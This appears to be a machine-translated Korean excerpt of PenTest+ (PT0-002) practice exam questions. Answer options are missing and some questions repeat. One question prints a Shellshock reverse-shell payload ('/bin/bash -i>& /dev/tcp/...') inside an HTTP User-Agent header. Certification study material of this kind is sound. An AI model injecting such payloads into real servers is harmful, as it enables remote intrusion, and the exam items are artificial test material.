PT0-002 문제 221
메일 서비스 회사는 이전 직원 계정이 여전히 활성 상태인지 확인하기 위해 SMTP 서버의 모든 사용자 계정을 조사하기 위해 침투 테스터를 고용했습니다. 목표를 달성하려면 다음 중 어떤 명령을 사용해야 합니까?
PT0-002 문제 222
참여 중에 침투 테스터가 파일 내에서 다음 문자열 목록을 발견했습니다.

다음 중 문자열의 알려진 일반 텍스트를 결정하는 가장 좋은 기술은 무엇입니까?

다음 중 문자열의 알려진 일반 텍스트를 결정하는 가장 좋은 기술은 무엇입니까?
PT0-002 문제 223
침투 테스터가 알 수 없는 환경 테스트 중에 ping -A 명령을 실행했으며 128 TTL 패킷을 반환했습니다. 다음 OS 중 이 유형의 패킷을 반환할 가능성이 가장 높은 OS는 무엇입니까?
PT0-002 문제 224
침투 테스터가 10.10.1.1에서 취약한 웹 서버를 발견했습니다. 그런 다음 테스터는 웹 익스플로잇을 보내는 Python 스크립트를 편집하고 다음 코드를 발견합니다.
explores = {"User-Agent": "() { 무시됨;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application /xhtml+xml,응용 프로그램/xml"}
다음 중 서버가 실행되는 사용자 컨텍스트를 결정하기 위해 테스터가 스크립트를 편집해야 하는 것은 무엇입니까?
explores = {"User-Agent": "() { 무시됨;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application /xhtml+xml,응용 프로그램/xml"}
다음 중 서버가 실행되는 사용자 컨텍스트를 결정하기 위해 테스터가 스크립트를 편집해야 하는 것은 무엇입니까?
PT0-002 문제 225
다음 웹 애플리케이션 보안 위험 중 OWASP Top 10 v2017에 포함된 것은 무엇입니까? (2개를 선택하세요.)
